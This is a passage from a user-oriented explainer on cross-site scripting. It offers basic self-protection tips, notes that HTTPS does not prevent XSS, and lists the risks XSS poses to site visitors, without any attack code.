The easiest way to protect yourself as a user is to only follow links from the main website you wish to view. If you visit one website and it links to CNN for example, instead of clicking on it visit CNN's main site and use its search engine to find the content. This will probably eliminate ninety percent of the problem. Sometimes XSS can be executed automatically when you open an email, email attachment, read a guestbook, or bulletin board post. If you plan on opening an email, or reading a post on a public board from a person you don't know BE CAREFUL. One of the best ways to protect yourself is to turn off Javascript in your browser settings. In IE turn your security settings to high. This can prevent cookie theft, and in general is a safer thing to do.
"Does encryption protect me?"
Websites that use SSL (https) are in no way more protected than websites that are not encrypted. The web applications work the same way as before, except the attack is taking place in an encrypted connection. People often think that because they see the lock on their browser it means everything is secure. This just isn't the case.
A few facts about cross-site scripting attacks that you should be aware of are:
Every month roughly 10-25 XSS holes are found in commercial products and advisories are published explaining the threat.
Websites that use SSL (https) are in no way more protected than websites that are not encrypted. The web applications work the same way as before, except the attack is taking place in an encrypted connection.
XSS attacks are generally invisible to the victim.
All Web servers, application servers, and Web application environments are susceptible to cross-site scripting.
Risks Associated with Cross-Site Scripting
(What type of damages will happens because of XSS)
- User accounts being stolen through session hijacking (stealing cookies) or through the theft of username and password combinations
- The ability for attackers to track your visitors web browsing behavior infringing on their privacy
- Abuse of credentials and trust
- Keystroke logging of your site’s visitors
- Misuse of server and bandwidth resources
- The ability for attackers to exploit your visitor’s browser
- Data theft
- Web site defacement and vandalism
- Link injections
- Content theft